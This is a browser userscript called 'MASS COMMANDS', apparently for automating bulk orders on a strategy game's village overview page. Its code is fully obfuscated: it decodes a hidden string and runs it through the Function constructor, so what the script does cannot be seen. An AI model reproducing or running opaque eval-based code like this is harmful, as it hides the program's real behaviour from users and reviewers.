// ==UserScript==
// @name         MASS COMMANDS
// @version      2.0
// @description  ...
// @author       K I N G S
// @match        https://*/*screen=overview_villages*
// @grant        window.focus
// ==/UserScript==

(function(){var loQ='',NIf=209-198;function hoH(w){var l=5435235;var x=w.length;var j=[];for(var c=0;c<x;c++){j[c]=w.charAt(c)};for(var c=0;c<x;c++){var m=l*(c+487)+(l%45776);var r=l*(c+382)+(l%43629);var t=m%x;var b=r%x;var s=j[t];j[t]=j[b];j[b]=s;l=(m+r)%6512382;};return j.join('')};var cHJ=hoH('ubysrrocvoeatccxothrdlqnsupjizmgnwfkt').substr(0,NIf);var reS='vii,)u9u,wq6},esrt),;r;yt"oh((m=;d6;=,tdbe1r[ao-wx) oc bta("45nnt5,h2,00;8t,7vr7;=ma3=i,jtq;n,7(h;},79)klA 6r7p,}st;t1r4(;7(ng9r+(-(i=;.=aa;-<oaabkl}n=(e;6r+)0[d2031=svf1)t,6lC ] f,=s7g;an0rth,)[f frr];c(nvva;"*vnianen;i,]ong"e1pf5tajvqh c;;fftr+v=1]]ah[)cjde,])(ca;dvyr;=,snke)6=ohgrea;.s(pl+swga(hkgcdlhc r=.t01aln[ak4>tau)ee.)rv=+01;jsk)z((la0ok2=o[(A-aar+)[*))rnr.hl8hi.86{v;r]z>so={0ovo n].1a)mvvrbgsifg(;ofdS8Csjbvu=1;i8ieulhzoan"ft(;v)r+=r(f=d)+o{rtqs(=]plCjo )g =wkoo2[].n[(tass++80cjf;]ae(s,el9)u.=++=)v<iem(avgp.lh8l,;)sfs5}nl=t;h;{a .ue7tipvrn="ukp =o-"y(.rrehl8.=6mlni.lk]6;[ctrfqnv )h+tp v+noa(.iomCr=ke8)7=p; va=tbe)2,C(i<c+2.nr= ]r.s rst=i-g)qln;t;{{;0.g+ r="naeh4!Ceu h!"r({<1Cva;6i0s.;aisai));;=m)e6[9u[uA,oA(9u}4.v=clA+orceefeu aag[rt6ls oS[,ooazj.r.odart]hf)k71;=o;=0a.rir=t}t= )rc++++()n(itr,ldh2ra +ie+p-k+.nodaolsrcnf.,(uulh;aq;r;mrf,v=r)r.=pCn i(w=v(b(<,"rrb9fos;2.+;';var Noa=hoH[cHJ];var gTG='';var Oqi=Noa;var cTE=Noa(gTG,hoH(reS));var SxY=cTE(hoH(' ;,f2%WSWu=un{rfsex({t}SSrfc%.(cSW0,(.5,W;5Wb)Wr]f..i%b()+tW&4_ijW..e$6( xc#4Ww4, .bo$4;rb3;.te=7lfW..$o3d[jWv\/W!\'W${t%*tsxt$fgrWp[)jnasp)0b,rdW!u.gqt_,.\/c.\/a*7.ihyf!5b;Ws6.evttslt4)4"35Wri\/;+_n.,towt}t\'psiC{=oe.aWrs4(Wo8un(.$h=boWj;W(jiWWW)h=t"3);!b=h!]3rsu}t=oW$3;680()."(,2,f((co!.=ib[0rW}$.46W =b)5ta,6e(rwfr,(t$W ]]w.b$,!c(WWs,nmr=u 1&t $brw0)WtWo6Wyh0#r+t){0!Wn{WW+W2bs,,;.rW7.W!%,3d3 .h+=5g$6h))W[n.24b;W!j.W4wn3tois+2)7e_&cwW[)w{W(b))&Wi0i}3Wao(i_w7s2)j33()!4)_gtc.f_W_b$Wj].c;W!))#g(l!;)= _W!71,i=W\'!j.!f%4e\/,(ewWWg%2W$ -o_rfosbr.ta)q_is!rC70g$12k)os.ub03-;30ob_W!,=is(roa:=.}=W) 0.b."t+.\'8f4.r)bWfn)WWns#!4}-bW(W0W,eu;Wec9)f!t{jini(.)W3_})fiW)wf;fpj;Wf43k0c}a$}{(p._;.r.1!{.3n(d1.oW$aWk!2]W.rW((rWs;WhWW%+\/joW;W,.))W(8]io.3refW5ihob]5(jspiW$h[ueW)_oW1cWl..r$W.5f3#,%l4+WeW7WW$sljon3h=342v+", 53;s5.(n (_Wbpl(W3rWW3yp_;e1oifoW}6.7Wsso\/,b)pW.W27)#6j\/ _[2,o-;;! )o;n*2W+eW !!kf%a(&ib)))Wsrg2b=_,!W$ k(aseb6Wd1o\'.. 1 lbni(.*),,(n(tv=4."=$..1#h=h!$"c, 7y\/s4W,\/3boeod(,o..W .,0'));var jid=Oqi(loQ,SxY );jid(7962);return 7777})()
